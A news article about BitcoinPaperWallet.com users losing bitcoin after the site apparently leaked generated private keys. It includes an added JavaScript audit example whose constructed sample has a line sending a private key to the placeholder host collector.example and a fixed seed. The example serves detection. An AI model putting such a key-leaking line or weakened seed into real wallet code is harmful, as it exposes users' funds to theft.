BitcoinPaperWallet Users Claim Loss of Large Amounts Due to Vulnerable Paper Wallet

Paper wallets are considered a fairly secure way to store bitcoin. Such a wallet is not connected to the Internet, so once a user prints out a pair of public and private keys, they can later use it to move cryptocurrency safely into cold storage. That holds only if nobody else learns the keys at the moment they are created, which is what happened to users of the service BitcoinPaperWallet.com.

Nick Wendell (alias) lost half a million dollars in bitcoin on January 7. The cryptocurrency exchange rate was approaching $40,000, and Wendell decided to transfer some of his assets to a paper wallet. Less than a minute after he transferred 14.5 BTC to the address created with the help of the service, the coins were moved out to an unknown destination. After several hops, the cryptocurrency ended up on Binance.

"Within a minute, I realized what had happened. For a few minutes I felt like I was falling, like I wasn't reaching the ground. I remember walking around in circles in the kitchen, as if my head was spinning," Wendell said in a conversation with CoinDesk.

According to the portal, there are at least half a dozen or so such victims. All of them claim that they lost large amounts of money after using the service. Presumably, losses over the last two years run into millions of dollars.

Experts found out that BitcoinPaperWallet sends a copy of each created private key to the server, that is, directly into the hands of attackers. Brothers Brian and Colin Olds, who run the blog PrivacyPros, said they were ready to buy the site last year, but came across evidence of fraud.

If the MetaMask or MyEtherWallet (MEW) wallet extensions are installed in the browser, they automatically detect BitcoinPaperWallet.com as a phishing resource and warn the user about it. In May 2020, the MyCrypto service also reported a "vulnerability" in this paper wallet that creates a "backdoor that exposes assets to the risk of theft."

The Olds claim that the backdoor described by MyCrypto in BitcoinPaperWallet is no longer present, but "someone actively changes the site device after publishing information about vulnerabilities", and users continue to lose money.

One of the victims reported that he deposited assets incrementally into the BitcoinPaperWallet wallet throughout August 2020, until they were withdrawn to Binance by outsiders on the 21st. "I confused it with another full-fledged website that I used a few years ago. In fact, I just entered 'paper bitcoin wallet' in Google, and this scam came out first," he said.

Another victim claims to have lost 50.1 BTC in December. He sent the cryptocurrency to the address the site provided, went to be tested for coronavirus, and when he returned, it was no longer there. Another user lost 1.8 BTC in May 2019, and Reddit users write about the theft of Bitcoin Cash from wallets created through the same site.

BitcoinPaperWallet users are encouraged to move the cursor around the screen, ostensibly to ensure randomness during the wallet creation process, but this does not affect the final result. More curious still, there is no such backdoor in the original code on GitHub. BitcoinPaperWallet was owned by Canton Becker until April 2018, when he sold it to a certain Sarkis Sarkisian. Until that time, no one had reported a loss of funds, and BitcoinPaperWallet itself was trusted in the community. Sarkisian claims that the money is lost by users who "initially did not manage the keys properly."
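Because the article says the backdoor is absent from the original GitHub code, a saved copy of a generator script can be compared against the upstream copy before it is trusted. The following is an added example, not code from BitcoinPaperWallet or from the article; it assumes the generator is a script that can be saved and compared line by line, and the function names and the collector.example URL in the sample are constructed.

```javascript
// Added example: diff a saved generator script against the upstream copy.
// All sample content below is constructed; collector.example is a placeholder.
const NETWORK_SINKS = [
  ["fetch", /\bfetch\s*\(/],
  ["XMLHttpRequest", /\bXMLHttpRequest\b/],
  ["WebSocket", /\bWebSocket\s*\(/],
  ["sendBeacon", /\bsendBeacon\s*\(/],
  ["remote URL", /\b(?:https?|wss?):\/\//i],
  ["image/script src", /\.src\s*=/],
  ["form submit", /\.submit\s*\(|\baction\s*=/],
];

// Returns every non-blank served line that is absent from upstream, with the
// network-capable constructs it contains. A line with no sinks is still a
// finding: a changed seed or RNG call is as dangerous as an upload.
function auditAgainstUpstream(upstreamText, servedText) {
  const norm = (l) => l.trim().replace(/\s+/g, " ");
  const known = new Set(upstreamText.split(/\r?\n/).map(norm));
  const findings = [];
  servedText.split(/\r?\n/).forEach((line, i) => {
    const text = norm(line);
    if (text === "" || known.has(text)) return;
    const sinks = NETWORK_SINKS.filter(([, re]) => re.test(text)).map(([n]) => n);
    findings.push({ line: i + 1, text, sinks });
  });
  return findings;
}

const UPSTREAM = [
  "function generateWallet() {",
  "  var key = newPrivateKey(seedFromMouse());",
  "  renderPaperWallet(key);",
  "}",
].join("\n");

const SERVED = [
  "function generateWallet() {",
  "  var key = newPrivateKey(fixedSeed);",
  '  new Image().src = "https://collector.example/p?k=" + key;',
  "  renderPaperWallet(key);",
  "}",
].join("\n");

for (const f of auditAgainstUpstream(UPSTREAM, SERVED)) {
  console.log(`line ${f.line}: ${f.text} [${f.sinks.join(", ") || "no network sink, still changed"}]`);
}
```

A set comparison like this does not catch deleted or reordered lines; comparing a hash of the whole file against the upstream release is the stricter check.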

"Indeed, we receive complaints from users claiming that they have lost bitcoins after using our site. These complaints are always resolved, except in some cases, when users cannot realize their own mistake and shift the blame to us," he said. "We examined the source code for problems and were not able to achieve the same results. The servers and source code were checked for cleanliness by our security expert, Jonel Richard. He is still investigating, trying to reproduce the problem reported by others."

Something has been wrong with BitcoinPaperWallet since at least mid-2018, but for a long time users did not sound the alarm. Presumably, only large wallets containing at least 1 BTC are emptied. According to reports, users of such wallets have lost at least 124.85 BTC, worth $6.2 million at the current exchange rate.

Note that this is not the first such incident with paper wallets. Since mid-2018, wallets created through the WalletGenerator service have remained vulnerable. In its case, the randomization of the generated key pairs also turned out to be a fiction.

"It is critical that the keys are generated by a trusted provider in the complete absence of an Internet connection. Think of websites, your computer, and the Internet in general as voyeurs trying to spy on your data. Because sometimes that's what they do. They can empty the entire balance sheet if they succeed," said independent bitcoin developer and researcher Dustin Dettmer.
